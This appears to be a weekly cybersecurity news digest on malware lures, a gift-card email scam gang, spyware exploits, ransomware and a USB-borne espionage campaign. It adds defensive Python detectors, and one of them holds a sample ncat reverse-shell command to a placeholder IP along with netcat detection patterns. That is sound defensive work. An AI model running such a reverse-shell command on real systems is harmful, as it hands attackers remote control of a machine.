At a glance.
- Adversarial activity.
- Risk and trend reports.
- Sandworm renews ransomware activity against Ukrainian targets.
- Internet service in Ukraine and Moldova interrupted by strikes against Ukraine's power grid.
- Google announces new support for Ukraine.
- DDoSing the Vatican.
- European Parliament sustains brief DDoS attack.
- Iran's Fars news agency reports cyberattack.
- Killnet claims to have counted coup against the White House.
- DDoS as a holiday-season threat to e-commerce.
- From criminals to hacktivists.
- Predictions for 2023.
Adversarial activity of the week.
Attackers are exploiting a popular TikTok challenge to distribute malware, according to researchers at Checkmarx. A trending TikTok challenge involves posing naked using a filter called “Invisible Body,” which (they say) replaces the user’s body with a blurred outline. Attackers capitalized on this by purporting to offer another filter that could remove the Invisible Body filter and expose the user’s naked body. The filter is fake, and installing it delivers the WASP stealer malware. (If you fall for this, you probably fell for the X-Ray Specs ads in the old comic books.) The researchers observed that more than 30,000 users have joined the attackers’ Discord server so far. BleepingComputer notes that the GitHub repo hosting the malicious code reached trending status on GitHub. For more on this cyber-version of X-Ray Specs, see CyberWire Pro.
Abnormal Security describes a business email compromise (BEC) gang dubbed “Lilac Wolverine” that’s launching widespread campaigns asking for gift cards. The threat actor begins by compromising a personal email account and copying its contact list. The attackers then set up a lookalike account that reuses the compromised address's username (the part before the @) on a different provider, usually Gmail, Hotmail, or Outlook, so the new address differs only in its domain. They’ll then use this account to send emails to the compromised account’s contacts. If the recipient hesitates, the attackers will explain that “the fictional birthday friend also has cancer or just lost loved ones to COVID-19—or both.” The researchers note that gift card requests are the most popular form of payment in BEC attacks, despite offering a lower payout per attack. For more on Lilac Wolverine, see CyberWire Pro.
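The pattern above is detectable at the mail gateway: a sender whose username matches someone the recipient already corresponds with, but whose domain has changed, combined with gift-card and pressure language. The following is an added illustration, not code from Abnormal Security; the address book, the sample messages, the keyword lists and the score weights are all constructed assumptions for this example.

```python
"""
Added example (not from the Abnormal Security report): score inbound mail for the
Lilac Wolverine pattern. A "lookalike" sender reuses a known contact's local part
(username) on a different domain; the score rises further when the new domain is a
free-mail provider and the body asks for gift cards or applies emotional pressure.
All data below is constructed for the example.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed address book: addresses the recipient already corresponds with.
KNOWN_CONTACTS = {
    "jane.doe@yahoo.com",
    "bob.smith@company.example",
}

# Providers the report says the attackers favour (assumption: tune to your telemetry).
FREEMAIL_DOMAINS = {"gmail.com", "hotmail.com", "outlook.com"}

# Constructed keyword lists; real deployments would use a richer classifier.
GIFT_CARD_TERMS = re.compile(r"\b(gift\s*cards?|itunes|google play|amazon|steam)\b", re.I)
PRESSURE_TERMS = re.compile(
    r"\b(birthday|cancer|covid|hospital|lost\s+(?:her|his|their)|urgent|asap)\b", re.I
)

# Score weights are assumptions chosen for this example.
W_LOOKALIKE, W_FREEMAIL, W_GIFT, W_PRESSURE = 50, 10, 25, 15
SUSPICIOUS_THRESHOLD = 60


@dataclass
class Verdict:
    sender: str
    lookalike_of: Optional[str]
    score: int
    reasons: List[str] = field(default_factory=list)


def split_address(addr: str):
    """Return (local_part, domain), lower-cased. rpartition tolerates '@' in the local part."""
    local, _, domain = addr.strip().lower().rpartition("@")
    return local, domain


def find_lookalike(sender: str) -> Optional[str]:
    """Return the known contact whose username the sender reuses on another domain, if any."""
    s_local, s_domain = split_address(sender)
    for contact in KNOWN_CONTACTS:
        c_local, c_domain = split_address(contact)
        if s_local == c_local and s_domain != c_domain:
            return contact
    return None


def score_message(sender: str, body: str) -> Verdict:
    """Combine the sender check with content heuristics into a single verdict."""
    v = Verdict(sender=sender, lookalike_of=find_lookalike(sender), score=0)
    if v.lookalike_of:
        v.score += W_LOOKALIKE
        v.reasons.append(f"username matches known contact {v.lookalike_of} on a different domain")
        if split_address(sender)[1] in FREEMAIL_DOMAINS:
            v.score += W_FREEMAIL
            v.reasons.append("new domain is a free-mail provider")
    if GIFT_CARD_TERMS.search(body):
        v.score += W_GIFT
        v.reasons.append("asks for gift cards")
    if PRESSURE_TERMS.search(body):
        v.score += W_PRESSURE
        v.reasons.append("emotional or urgency pressure")
    return v


def is_suspicious(v: Verdict) -> bool:
    return v.score >= SUSPICIOUS_THRESHOLD


# Constructed sample messages: a lookalike gift-card ask, and a benign note from the real address.
SAMPLES = [
    ("jane.doe@gmail.com",
     "Happy birthday! Could you grab three gift cards for my friend? She has cancer."),
    ("jane.doe@yahoo.com", "See you at lunch on Friday."),
]

if __name__ == "__main__":
    for sender, body in SAMPLES:
        v = score_message(sender, body)
        print(f"{sender}: score={v.score} suspicious={is_suspicious(v)} reasons={v.reasons}")
```

The lookalike check alone is deliberately weighted below the threshold: people do change providers, so a matching username on a new domain is a lead, not a verdict, and only the request for value pushes it over.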
Google’s Threat Analysis Group (TAG) has published a report on a commercial spyware framework developed by a Barcelona-based company, Variston IT. The framework, called “Heliconia,” exploited vulnerabilities in Chrome, Firefox, and Microsoft Defender. While the vulnerabilities have since been patched, TAG says “it appears likely these were utilized as zero-days in the wild.” An anonymous submission to the Chrome bug reporting program tipped the researchers off to three distinct frameworks. Heliconia Noise is a “web framework for deploying a Chrome renderer exploit, followed by a Chrome sandbox escape and agent installation,” while Heliconia Soft is “a web framework that deploys a PDF containing a Windows Defender exploit.” Heliconia Files offers “a fully documented Firefox exploit chain for Windows and Linux.” See CyberWire Pro for more on Heliconia.
Sophos Wednesday reported on its reverse engineering of LockBit 3.0 (also known as LockBit Black). It appears that the ransomware's operators are experimenting with making their malware wormable, that is, giving it functionality that would enable it to spread by itself through and across networks. Sophos's research also offers some support to other security experts who've suspected a connection between LockBit and the BlackMatter ransomware family. The researchers "found a number of similarities which strongly suggest that LockBit 3.0 reuses code from BlackMatter," especially in its anti-debugging, obfuscation, API resolution, printer-attack, and shadow-copy deletion features. There are other similarities as well, and Sophos points out that much of LockBit 3.0's tooling mimics what a legitimate penetration tester might use.
Mandiant reports that cyberespionage it associates with Chinese intelligence services is currently active against targets in Southeast Asia, particularly in the Philippines. The campaign uses compromised USB drives as a principal attack vector, thus counting on users delivering the malware across whatever protective air gaps may exist. The principal tools it uses are MISTCLOAK (a launcher written in C++), BLUEHAZE (another launcher, this one written in C/C++, "that launches a copy of NCAT to create a reverse shell to a hardcoded command and control"), DARKDEW (a dropper able to infect removable drives), and NCAT (useful to "upload or download files, create backdoors or reverse shells, and tunnel traffic to evade network controls"). The campaign may have been in progress since September 2021, and Mandiant reads it as an example of Chinese determination to establish and maintain persistence in targets of interest.
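Because the campaign leans on a renamed copy of a legitimate tool rather than bespoke malware, process-creation telemetry is a good place to hunt for it: ncat handing a shell to a remote peer, a hard-coded IP and port on the command line, and a binary running from a drive that is not the system drive. The scanner below is an added example, not Mandiant's tooling or detection content; the records are constructed, the Sysmon-style field names (image, cmdline, parent) are an assumption, and treating any non-C: drive as "possibly removable" is a simplification for the example.

```python
"""
Added example (not Mandiant's): scan constructed process-creation records for the
ncat usage described for BLUEHAZE (a reverse shell to a hard-coded C2) and for netcat
launched from a non-system drive, as a USB-borne copy would be.
"""
import re

# Names a dropped copy of ncat/netcat commonly keeps (attackers may rename it; treat as a baseline).
NETCAT_NAMES = {"ncat", "ncat.exe", "nc", "nc.exe", "netcat", "netcat.exe"}
# Options that hand a program to the remote peer. -e/-c also exist in other netcat builds.
EXEC_FLAGS = {"-e", "--exec", "-c", "--sh-exec", "--lua-exec"}
SHELL_RE = re.compile(r"(cmd(\.exe)?|powershell(\.exe)?|pwsh|(ba|z|da)?sh)$", re.I)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed records in a generic Sysmon Event ID 1 shape (field names are an assumption).
RECORDS = [
    {"image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir", "parent": "explorer.exe"},
    {"image": r"E:\Drivers\ncat.exe", "cmdline": "ncat.exe -e cmd.exe 203.0.113.10 4444", "parent": "setup.exe"},
    {"image": r"C:\Tools\nmap\ncat.exe", "cmdline": "ncat.exe --ssl 192.0.2.5 443", "parent": "cmd.exe"},
    {"image": r"C:\Tools\nmap\ncat.exe", "cmdline": "ncat.exe -l 8080", "parent": "cmd.exe"},
]


def basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def analyze(record: dict):
    """Return None for non-netcat processes, else a finding dict with a severity."""
    # Whitespace split is adequate for ncat's simple argv; it is not a full Windows cmdline parser.
    argv = record["cmdline"].split()
    if not argv or basename(argv[0]) not in NETCAT_NAMES:
        return None
    args = argv[1:]
    findings = []

    exec_flag = next((a for a in args if a in EXEC_FLAGS), None)
    if exec_flag:
        findings.append(f"hands a program to the peer via {exec_flag}")
        i = args.index(exec_flag)
        if i + 1 < len(args) and SHELL_RE.search(args[i + 1]):
            findings.append("that program is an interactive shell")

    listening = any(a in ("-l", "--listen") for a in args)
    c2 = None
    for i, a in enumerate(args):
        # A positional IPv4 literal followed by a port is the hard-coded C2 the report describes.
        if IPV4_RE.match(a) and i + 1 < len(args) and args[i + 1].isdigit():
            c2 = f"{a}:{args[i + 1]}"
            break
    if c2 and not listening:
        findings.append(f"connects out to hard-coded {c2}")

    drive = record["image"][:2].upper()
    if re.match(r"[A-Z]:", drive) and drive != "C:":
        # Assumption for the example: anything outside the system drive deserves a look.
        findings.append(f"binary runs from {drive} (non-system drive; possibly removable media)")

    if exec_flag and c2 and not listening:
        severity = "high"      # reverse shell to a fixed address: the BLUEHAZE behaviour
    elif c2 and not listening:
        severity = "medium"    # outbound tunnel or file transfer, no shell handed over
    else:
        severity = "low"       # listener or unclear usage; still worth a look
    return {"image": record["image"], "severity": severity,
            "c2": None if listening else c2, "findings": findings}


def scan(records):
    """Apply analyze() to every record and keep the hits."""
    return [r for r in (analyze(rec) for rec in records) if r is not None]


if __name__ == "__main__":
    for hit in scan(RECORDS):
        print(hit["severity"].upper(), hit["image"], "->", "; ".join(hit["findings"]))
```

The baseline name list is the weak point: a dropper can rename the binary freely, so in production pair this with a hash or signer check on the image (Nmap's ncat is signed) rather than trusting the file name.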
The Cuba ransomware operations, the FBI and the US Cybersecurity and Infrastructure Security Agency (CISA) warned Thursday, have taken in aggregate some $60 million from more than a hundred victims. The gang, which has no connection with the country, government, or island of Cuba, has recently been deploying RomCom malware, a custom remote access Trojan (RAT) used for command-and-control. The gang also seems to be "leveraging," as CISA and the FBI put it, Industrial Spy ransomware against its victims. An account of indicators of compromise and appropriate defensive measures appears in the alert.